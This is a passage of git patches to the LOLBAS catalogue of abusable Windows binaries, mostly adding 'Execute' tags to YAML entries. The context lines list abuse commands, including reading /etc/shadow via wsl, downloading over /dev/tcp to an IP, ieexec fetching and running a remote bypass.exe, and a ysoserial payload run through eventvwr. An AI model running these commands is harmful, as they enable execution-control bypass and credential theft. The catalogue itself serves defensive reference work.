OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe" Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW. Usecase: Proxy execution of binary with arguments @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: From 780b478272e653fbac74c9153e755dc55e75e1a3 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:37:05 +0200 Subject: [PATCH 133/148] Update VSIISExeLauncher.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 428d7307..86d34a90 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with VS/VScode installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' Code_Sample: From ed5266d49b00a5ff81536d4633ea327037c7d289 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:42:44 +0200 Subject: [PATCH 134/148] Update VisualUiaVerifyNative.yml Tags Added Tags: Execute .NetObjects --- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index d3c0b05b..ed919008 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: .NetObjects Full_Path: - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe From e0b8769c6d3cc3ec47ffe8288dc3994f62eb3dfb Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:43:58 +0200 Subject: [PATCH 135/148] Update VsLaunchBrowser.yml Tags Added Tags: Execute EXE Execute Remote --- yml/OtherMSBinaries/VsLaunchBrowser.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yml/OtherMSBinaries/VsLaunchBrowser.yml b/yml/OtherMSBinaries/VsLaunchBrowser.yml index 723ed348..578464cf 100644 --- a/yml/OtherMSBinaries/VsLaunchBrowser.yml +++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: VSLaunchBrowser.exe .exe \\Server\Path\file Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. @@ -27,6 +29,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe From d170ef468bfba830222b0ccaae1defcdadb1dde2 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:44:41 +0200 Subject: [PATCH 136/148] Update Vshadow.yml Tags Added Tags: Execute: EXE --- yml/OtherMSBinaries/Vshadow.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml index 4adf4ff2..36c743df 100644 --- a/yml/OtherMSBinaries/Vshadow.yml +++ b/yml/OtherMSBinaries/Vshadow.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\\x64\vshadow.exe Detection: From ec0a196f80ef15803f1808effb8a30267b018001 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:45:13 +0200 Subject: [PATCH 137/148] Update Vsjitdebugger.yml Tags Added Tags Execute EXE --- yml/OtherMSBinaries/Vsjitdebugger.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index 9c983a5d..e6fb2f31 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe Code_Sample: From f428073f996ab33b81014fc7a0479ebd83151259 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:45:53 +0200 Subject: [PATCH 138/148] Update Wfc.yml Tags Added Tags: Execute C# --- yml/OtherMSBinaries/Wfc.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index e66ddb8f..806df6d0 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Csharp Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe Code_Sample: From 842865cc73847b449c88db687efe1d448e7d3ce6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:47:32 +0200 Subject: [PATCH 139/148] Update Wsl.yml Tags Added Tags: Execute EXE Execute CMD --- yml/OtherMSBinaries/Wsl.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1493d19..11d34d9a 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: EXE - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: EXE - Command: wsl.exe --exec bash -c "" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: CMD - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file From cc88242bc9f1ffb07aceec39604f74f4e7c6c6f0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:48:40 +0200 Subject: [PATCH 140/148] Update winfile.yml Tags Added Tags --- yml/OtherMSBinaries/winfile.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml index f0171ed3..91c83a70 100644 --- a/yml/OtherMSBinaries/winfile.yml +++ b/yml/OtherMSBinaries/winfile.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\winfile.exe - Path: C:\Windows\winfile.exe From 8e3710a99c6212ba90e6bec80f57e3469dd14f63 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:49:46 +0200 Subject: [PATCH 141/148] Update Csi.yml: Syntax error --- yml/OtherMSBinaries/Csi.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 939eb1cc..bae245ee 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -11,7 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows - - Execute: Csharp + Tags: + - Execute: Csharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe From f06ab897c3c47e9ffe12ccf4933c4ca106bb3c77 Mon Sep 17 00:00:00 2001 From: Hegusung Date: Sun, 13 Oct 2024 23:12:05 +0200 Subject: [PATCH 142/148] Revert "Update gh-pages.yml" This reverts commit 0e177e7d6e1965abdfa69298db742bf90bc1efa0. --- .github/workflows/gh-pages.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index b3545131..0e3d285c 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -10,7 +10,7 @@ on: jobs: build: runs-on: ubuntu-latest - if: ${{ github.event.workflow_run.conclusion == 'success' }} + if: ${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }} steps: - uses: actions/checkout@v2 From 0dc5a46a2faafac07862b61b3005043214ecd0e8 Mon Sep 17 00:00:00 2001 From: Hegusung Date: Sun, 13 Oct 2024 23:12:15 +0200 Subject: [PATCH 143/148] Revert "Update gh-pages.yml" This reverts commit 0795916fba11963fa8b5a77e31a2883cebc567a2. --- .github/workflows/gh-pages.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 0e3d285c..d3d3f7e3 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -2,6 +2,24 @@ name: Update LOLBAS-Project-hegusung.github.io on: workflow_dispatch: + inputs: + logLevel: + description: 'Log level' + required: true + default: 'warning' + type: choice + options: + - info + - warning + - debug + tags: + description: 'Test scenario tags' + required: false + type: boolean + environment: + description: 'Environment to run tests against' + type: environment + required: true workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] From 3cfdfdc57398e27b0a11c244755ffcbfe12a3df7 Mon Sep 17 00:00:00 2001 From: Hegusung Date: Sun, 13 Oct 2024 23:12:16 +0200 Subject: [PATCH 144/148] Revert "Update gh-pages.yml" This reverts commit 679b321c343f15bd6ad4e0fe7010ad3dee6593e0. --- .github/workflows/gh-pages.yml | 19 ------------------- 1 file changed, 19 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index d3d3f7e3..b053a7c1 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -1,25 +1,6 @@ --- name: Update LOLBAS-Project-hegusung.github.io on: - workflow_dispatch: - inputs: - logLevel: - description: 'Log level' - required: true - default: 'warning' - type: choice - options: - - info - - warning - - debug - tags: - description: 'Test scenario tags' - required: false - type: boolean - environment: - description: 'Environment to run tests against' - type: environment - required: true workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] From 0935d63fa187dc3bbbe7b4edb74fe6949a92d679 Mon Sep 17 00:00:00 2001 From: Hegusung Date: Sun, 13 Oct 2024 23:12:17 +0200 Subject: [PATCH 145/148] Revert "Update gh-pages.yml" This reverts commit 8715370aa8663be2c0964b256ac6797109a31872. --- .github/workflows/gh-pages.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index b053a7c1..c9ce872f 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -1,5 +1,5 @@ --- -name: Update LOLBAS-Project-hegusung.github.io +name: Update LOLBAS-Project.github.io on: workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] @@ -21,11 +21,11 @@ jobs: mv yml/OSScripts yml/Scripts rm -r yml/HonorableMentions - - name: Deploy to LOLBAS-Project-hegusung.github.io repo + - name: Deploy to LOLBAS-Project.github.io repo uses: peaceiris/actions-gh-pages@v3 with: deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }} - external_repository: hegusung/LOLBAS-Project-hegusung.github.io + external_repository: LOLBAS-Project/LOLBAS-Project.github.io publish_branch: master publish_dir: yml destination_dir: _lolbas From b1fb82ad1156e53dec52ca0cbd1d32feed926ca3 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Mon, 14 Oct 2024 19:10:35 +0200 Subject: [PATCH 146/148] Update Dfshim.yml: Typo --- yml/OSLibraries/Dfshim.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 6f76b896..3796255a 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: ClickOne + - Execute: ClickOnce - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe From 089614e6a9978794dac3f89c9ab108895909d204 Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 20 Nov 2024 23:08:37 +0000 Subject: [PATCH 147/148] Various changes to Execute tags --- yml/OSBinaries/Addinutil.yml | 2 +- yml/OSBinaries/At.yml | 2 +- yml/OSBinaries/Cmstp.yml | 1 + yml/OSBinaries/Conhost.yml | 4 ++-- yml/OSBinaries/Eventvwr.yml | 2 ++ yml/OSBinaries/Hh.yml | 7 +++--- yml/OSBinaries/Ieexec.yml | 4 ++-- yml/OSBinaries/Installutil.yml | 8 +++---- yml/OSBinaries/Jsc.yml | 4 ++-- .../Microsoft.Workflow.Compiler.yml | 6 ++--- yml/OSBinaries/Mmc.yml | 4 +++- yml/OSBinaries/Msbuild.yml | 6 ++--- yml/OSBinaries/Msiexec.yml | 2 ++ yml/OSBinaries/Regasm.yml | 4 ++-- yml/OSBinaries/Regsvcs.yml | 4 ++-- yml/OSBinaries/Rundll32.yml | 22 ++----------------- yml/OSBinaries/Runscripthelper.yml | 2 +- yml/OSBinaries/Schtasks.yml | 4 ++-- yml/OSBinaries/SettingSyncHost.yml | 2 +- yml/OSBinaries/Ssh.yml | 4 ++-- yml/OSBinaries/Syncappvpublishingserver.yml | 2 +- yml/OSBinaries/Verclsid.yml | 2 +- yml/OSBinaries/Wmic.yml | 4 ++-- yml/OSBinaries/Xwizard.yml | 4 ++-- yml/OSBinaries/msedgewebview2.yml | 6 ++--- yml/OSBinaries/wt.yml | 2 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Url.yml | 2 +- yml/OSScripts/CL_LoadAssembly.yml | 2 +- yml/OSScripts/CL_mutexverifiers.yml | 2 +- yml/OSScripts/Cl_invocation.yml | 1 - yml/OSScripts/Syncappvpublishingserver.yml | 2 +- yml/OSScripts/UtilityFunctions.yml | 2 +- yml/OSScripts/Winrm.yml | 3 +-- yml/OtherMSBinaries/AccCheckConsole.yml | 4 ++-- yml/OtherMSBinaries/Agentexecutor.yml | 2 +- yml/OtherMSBinaries/Csi.yml | 2 +- yml/OtherMSBinaries/DefaultPack.yml | 2 +- yml/OtherMSBinaries/Devtoolslauncher.yml | 4 ++-- yml/OtherMSBinaries/Dnx.yml | 2 +- yml/OtherMSBinaries/Dotnet.yml | 8 +++---- yml/OtherMSBinaries/Fsi.yml | 4 ++-- yml/OtherMSBinaries/FsiAnyCpu.yml | 4 ++-- yml/OtherMSBinaries/Rcsi.yml | 4 ++-- yml/OtherMSBinaries/Sqlps.yml | 2 +- yml/OtherMSBinaries/Sqltoolsps.yml | 2 +- yml/OtherMSBinaries/Teams.yml | 4 ++-- yml/OtherMSBinaries/Update.yml | 4 ++-- yml/OtherMSBinaries/VSDiagnostics.yml | 2 +- yml/OtherMSBinaries/Wfc.yml | 2 +- yml/OtherMSBinaries/Wsl.yml | 2 +- 52 files changed, 86 insertions(+), 100 deletions(-) diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 7ff31457..25564765 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetObjets + - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 12397727..80c5faaf 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.002 OperatingSystem: Windows 7 or older Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index bccde852..5bd76aac 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -22,6 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF + - Execute: Remote Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 3dca837f..cd076da4 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index e0a46a32..d8beeeae 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: .NetObjects Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index e861cd2b..fd09accc 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -11,8 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: HH.exe c:\windows\system32\calc.exe - Description: Executes calc.exe with HTML Help. + Tags: + - Execute: EXE + - Application: GUI Usecase: Execute process with HH.exe Category: Execute Privileges: User @@ -20,7 +21,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: HH.exe http://some.url/payload.chm + - Application: GUI Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 3b659dd0..f397b370 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - - Execute: .NetEXE + - Execute: EXE (.NET) - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - - Execute: .NetEXE + - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 8a070107..c9f29fe2 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL - - Execute: .NetEXE + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -22,8 +22,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL - - Execute: .NetEXE + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index b4e71983..3a5f5a60 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d76acaf..cd128954 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -22,8 +22,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - - Execute: VB.Net - - Execute: Csharp + - Execute: XOML - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -32,8 +31,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - - Execute: VB.Net - - Execute: Csharp + - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7cbe41ac..dab5e499 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. @@ -20,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index da29e92c..04ff916b 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Csharp + - Execute: CSharp - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -21,7 +21,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Csharp + - Execute: CSharp - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -39,7 +39,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 92390c16..7de2d333 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -51,6 +51,8 @@ Commands: MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: + - Execute: MSI + - Execute: MST - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 00863c97..a5314d11 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -21,7 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 1e6d7604..b1fde208 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting @@ -21,7 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: 